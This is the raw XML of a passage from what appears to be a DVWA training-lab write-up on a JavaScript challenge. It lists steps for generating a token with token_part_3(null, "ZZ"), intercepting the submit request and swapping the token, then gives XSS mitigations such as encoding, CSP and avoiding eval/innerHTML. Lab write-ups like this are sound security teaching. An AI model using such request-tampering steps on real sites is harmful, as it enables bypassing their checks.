            <wp:docPr id="18160356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7446" w14:textId="3BAC8FF8" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Run_Token_part_3_&amp;_Copy_Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB84DF4" w14:textId="77777777" w:rsidR="007A6DE1" w:rsidRPr="007A6DE1" w:rsidRDefault="007A6DE1" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6DE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>token_part_3(null, "ZZ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BB75A9" w14:textId="729338D8" w:rsidR="007A6DE1" w:rsidRDefault="007A6DE1" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6DE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ABB68A" w14:textId="6DDD8318" w:rsidR="00131E86" w:rsidRDefault="00131E86" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C5EF81E" wp14:editId="7C3ED094">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="192601771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88EC" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8EDC63" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A7D319" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D26644" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DE19C5" w14:textId="77777777" w:rsidR="00984C64" w:rsidRPr="00131E86" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577B9BE9" w14:textId="37B31F3F" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Intercept_Success_Word_Submit_Req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64796E8B" w14:textId="3A0EA842" w:rsidR="00131E86" w:rsidRDefault="00131E86" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BA77DBD" wp14:editId="4F2C9437">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="85800020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793E" w14:textId="54B63629" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Change_Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0D1F0A" w14:textId="3CD30B42" w:rsidR="00131E86" w:rsidRDefault="00131E86" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51B40410" wp14:editId="6FC0B6AA">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="192372478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F536" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E9A483" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640C0D31" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2900B7" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6D4D3A" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC180F4" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB553F1" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A44C6D" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F79D19A" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB780F4" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1A3A15" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17DC7103" w14:textId="1E6F38F7" w:rsidR="004363B6" w:rsidRDefault="007A6DE1" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="007A6DE1">
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531CCF77" w14:textId="1ECD1D63" w:rsidR="00131E86" w:rsidRPr="004363B6" w:rsidRDefault="00131E86" w:rsidP="00131E86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42EBFD54" wp14:editId="42C3E1F8">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8240746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31CB" w14:textId="77777777" w:rsidR="00005892" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc198745970"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="43478447" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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5F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 xml:space="preserve"> 1. Sanitize Input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA7382" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB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Strip dangerous characters like &lt;, &gt;, ", ', and ( from user inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1E024B" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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5F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 xml:space="preserve"> 2. Encode Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194AB657" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB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Use htmlspecialchars() or JavaScript-safe encoding before rendering user input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6241D8D5" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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5F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 xml:space="preserve"> 3. Avoid Dangerous DOM Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13284A2F" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB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Avoid using eval(), innerHTML, document.write() with untrusted data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB2A8A5" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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5F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 xml:space="preserve"> 4. Use Secure JavaScript Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFC84ED" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB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 xml:space="preserve">Libraries like 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Pr="009B25FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 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>Vue</w:t>
      </w:r>
      <w:r w:rsidRPr="009B25FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and 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>Angular</w:t>
      </w:r>
      <w:r w:rsidRPr="009B25FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> auto-sanitize content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758460C5" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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5F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 xml:space="preserve"> 5. Implement CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72815C40" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B25FB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 xml:space="preserve">A strict </w:t>
      </w:r>
      <w:r w:rsidRPr="009B25FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Content Security Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="009B25FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can prevent the execution of injected JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BCF8A9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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579C5D82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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6386398E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  <w:r w:rsidRPr="009B25FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Content-Security-Policy: default-src 'self'; script-src 'self'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B587BA" w14:textId="77777777" w:rsidR="009B25FB" w:rsidRPr="009B25FB" w:rsidRDefault="009B25FB" w:rsidP="009B2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5D362" w14:textId="77777777" w:rsidR="00005892" w:rsidRPr="00005892" w:rsidRDefault="00005892" w:rsidP="00005892"/>
    <w:sectPr w:rsidR="00005892" w:rsidRPr="00005892">
      <w:headerReference w:type="default" r:id="rId122"/>
      <w:footerReference w:type="default" r:id="rId1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1B78" w14:textId="77777777" w:rsidR="00940741" w:rsidRDefault="00940741" w:rsidP="00B422E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="77186B9E" w14:textId="77777777" w:rsidR="00940741" w:rsidRDefault="00940741" w:rsidP="00B4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572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9AFCE" w14:textId="746AEF52" w:rsidR="00B422E0" w:rsidRDefault="00B4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2E322" w14:textId="77777777" w:rsidR="00B422E0" w:rsidRDefault="00B4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2808" w14:textId="77777777" w:rsidR="00940741" w:rsidRDefault="00940741" w:rsidP="00B422E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="636BBE0A" w14:textId="77777777" w:rsidR="00940741" w:rsidRDefault="00940741" w:rsidP="00B4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F95F" w14:textId="2E49EF89" w:rsidR="00B422E0" w:rsidRDefault="009036BC">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:color w:val="4472C4" w:themeColor="accent1"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="4472C4" w:themeColor="accent1"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>DVWA</w:t>
    </w:r>
    <w:r w:rsidRPr="009036BC">
      <w:rPr>
        <w:color w:val="4472C4" w:themeColor="accent1"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:ptab w:relativeTo="margin" w:alignment="center" w:leader="none"/>
    </w:r>
    <w:r w:rsidRPr="009036BC">
      <w:rPr>
        <w:color w:val="4472C4" w:themeColor="accent1"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r w:rsidR="00CC7943">
      <w:rPr>
        <w:color w:val="4472C4" w:themeColor="accent1"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>Fiction_Terminal</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="713980B6" w14:textId="77777777" w:rsidR="009036BC" w:rsidRDefault="00903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9C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C5E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3768C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="51E8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0586C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0D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C0C04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2880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06B3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E5CE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72271"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F8B6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C3095"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4894C3A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230BE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="760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51EEE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A78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61415"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43D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F62F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B781E6E"/>
    <w:lvl w:ilvl="0" w:tplc="F07677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DE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBD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256B1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B57018A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B6EAF88"/>
    <w:lvl w:ilvl="0" w:tplc="EA2E86A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76AB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE12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1632B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BFE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34FC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A94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71C7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6A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448F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FBE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72E0E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CA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AC22E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B0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8F14A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="165C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B94C28"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5E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220990"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07B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87A13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18E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0365AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98F6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592E1B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B00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C11F53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE9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FA3ECF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="831E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6B1E86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3FF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4221A9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3FA5584B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D2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1A55F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08AE54C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sz w:val="22"/>
        <w:u w:val="single"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="940" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="default"/>
        <w:color w:val="0563C1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eastAsiaTheme="minorHAnsi" w:hint="default"/>
        <w:color w:val="0563C1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eastAsiaTheme="minorHAnsi" w:hint="default"/>
        <w:color w:val="0563C1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eastAsiaTheme="minorHAnsi" w:hint="default"/>
        <w:color w:val="0563C1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eastAsiaTheme="minorHAnsi" w:hint="default"/>
        <w:color w:val="0563C1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eastAsiaTheme="minorHAnsi" w:hint="default"/>
        <w:color w:val="0563C1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4060" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="default"/>
        <w:color w:val="0563C1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4640" w:hanging="2880"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="default"/>
        <w:color w:val="0563C1" w:themeColor="hyperlink"/>
        <w:sz w:val="22"/>
        <w:u w:val="single"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="42CC4C89"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1F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462A0C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83A0F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47531010"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4AA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AB3262"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BBA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937A79"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7528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184044"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54D2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857182"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8ED4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5500D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCE8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A4A1B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5910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B9208C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB307328"/>
    <w:lvl w:ilvl="0" w:tplc="A04AA3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A1BA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="052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9E0B98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="014C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E53BD4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD56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AC76A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A992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AE384E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F1C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476FEC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="165C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A3006D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="179A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FA29BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8FE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D67133"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52C0E9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04806"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97B2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9F3CB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1AF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9A3A54"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E9EA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CC4AAF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEE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EA5CAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19EA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D7641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04C6441"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0914BDCA"/>
    <w:lvl w:ilvl="0" w:tplc="8B56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125"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CFF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7D7D2C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC1A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C81288"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E089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F00D9E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22F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F138CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E51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B05ACE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="911E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706508">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="309553347">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2116049793">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1281378866">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1730614207">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="528681901">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="62532502">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="547957613">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1215115773">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="311301107">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="456267088">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="143789208">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1042628997">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1042705506">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2052073480">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1951735543">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1023089051">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1884243554">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="462505584">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="483282358">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="913900707">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1328703610">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1426540162">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1024482057">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1982340182">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="566189994">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1857617937">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="259535056">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="2116437812">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1440300710">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="235478820">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="673461232">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1550072655">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="957640307">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="138423516">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="689602487">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="100614390">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="984817161">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="771558904">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1200901873">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1658995373">
    <w:abstractNumId w:val="33"/>
  </w:num>
